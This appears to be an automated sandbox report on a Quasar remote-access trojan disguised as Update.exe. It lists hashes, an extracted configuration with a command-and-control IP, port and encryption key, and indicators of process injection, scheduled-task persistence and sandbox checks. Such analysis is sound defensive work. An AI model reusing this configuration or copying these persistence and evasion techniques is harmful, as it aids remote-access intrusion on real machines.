Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
21-04-2024 16:56
Behavioral task
behavioral1
Sample
Update.exe
Resource
win10-20240404-en
General
-
Target
Update.exe
-
Size
409KB
-
MD5
ed68b64af85a06a4d3edfb0eedbd5a00
-
SHA1
668dbc4990b0a1cdd2f0c254f41b539e9b69afc1
-
SHA256
347776cb31b6dfbb5a5cbb39e617b3913b8af8a0a826468b7e0df3b4738fc184
-
SHA512
7555b7ff4534f0549f35f14b47f8a75509801e4c87e3740aaae20cf6c291b1e17e8a4f833e05d73e2a39471e93a63b75d5513e999850a840ac58a38d656990be
-
SSDEEP
6144:nrBdTMOznI2U/rgSuXfh+8sopVpkG9YiLLLKItKbFrJCBzzFd3MI:oynI2UeXfh+X+5YiPLKItwyRd3MI
Malware Config
Extracted
quasar
3.1.5
SLAVE
147.185.221.19:33587
$Sxr-GdUyI5k46zQj7thBLl
-
encryption_key
y0X14czHxU2CjCZoALAD
-
install_name
BiosUpdX64.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4924-0-0x00000000007F0000-0x000000000085C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEsvchost.exedescription pid process target process PID 3520 created 584 3520 powershell.EXE winlogon.exe PID 2272 created 4608 2272 svchost.exe DllHost.exe -
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 2 IoCs
Processes:
BiosUpdX64.exeInstall.exepid process 508 BiosUpdX64.exe 4972 Install.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exeexplorer.exedescription ioc process File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\H: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 9 IoCs
Processes:
OfficeClickToRun.exeDllHost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.log DllHost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat DllHost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm DllHost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3520 set thread context of 4184 3520 powershell.EXE dllhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
explorer.exeSearchUI.exeDllHost.exedescription ioc process File created C:\Windows\rescache\_merged\2717123927\1590785016.pri explorer.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri SearchUI.exe File created C:\Windows\rescache\_merged\4032412167\4002656488.pri explorer.exe File opened for modification C:\Windows\Debug\ESE.TXT DllHost.exe -
Checks SCSI registry key(s) 3 TTPs 26 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 4356 schtasks.exe 4440 SCHTASKS.exe 4592 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Processes:
SearchUI.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\GPU SearchUI.exe -
Modifies data under HKEY_USERS 57 IoCs
Processes:
OfficeClickToRun.exepowershell.EXEsvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1713718672" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 21 Apr 2024 16:57:52 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE -
Modifies registry class 16 IoCs
Processes:
explorer.exeSearchUI.exesihost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e80704004100720067006a006200650078002000200033000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000074ae2078e323294282c1e41cb67d5b9c000000000000000000000000153edb0f0d94da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e80704004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c0000000000000000000000003079d60f0d94da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e80704004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc7600000000000000000000000021f776218a86da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000